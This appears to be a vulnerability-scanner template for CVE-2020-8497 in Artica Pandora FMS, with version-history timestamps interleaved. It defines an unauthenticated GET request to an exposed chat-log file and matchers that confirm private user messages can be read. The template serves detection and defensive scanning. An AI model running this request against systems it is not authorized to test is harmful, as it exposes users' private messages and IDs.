2021-12-05 23:36:14 +00:00
id : CVE-2020-8497
info :
name : Artica Pandora FMS - Arbitrary File Read
author : gy741
severity : medium
description : In Artica Pandora FMS through 7.42, an unauthenticated attacker can read the chat history. The file is in JSON format and it contains user names, user IDs, private messages, and timestamps.
2021-12-06 05:09:43 +00:00
reference :
- https://k4m1ll0.com/cve-2020-8497.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-8497
2021-12-05 23:36:14 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 5.30
cve-id : CVE-2020-8497
cwe-id : CWE-306
2021-12-06 05:09:43 +00:00
tags : cve,cve2020,fms
2021-12-05 23:36:14 +00:00
requests :
- method : GET
path :
- '{{BaseURL}}/pandora_console/attachment/pandora_chat.log.json.txt'
matchers-condition : and
matchers :
- type : word
part : body
2021-12-06 05:09:43 +00:00
words :
- '"type"'
- '"id_user"'
- '"user_name"'
- '"text"'
2021-12-05 23:36:14 +00:00
condition : and
- type : status
status :
- 200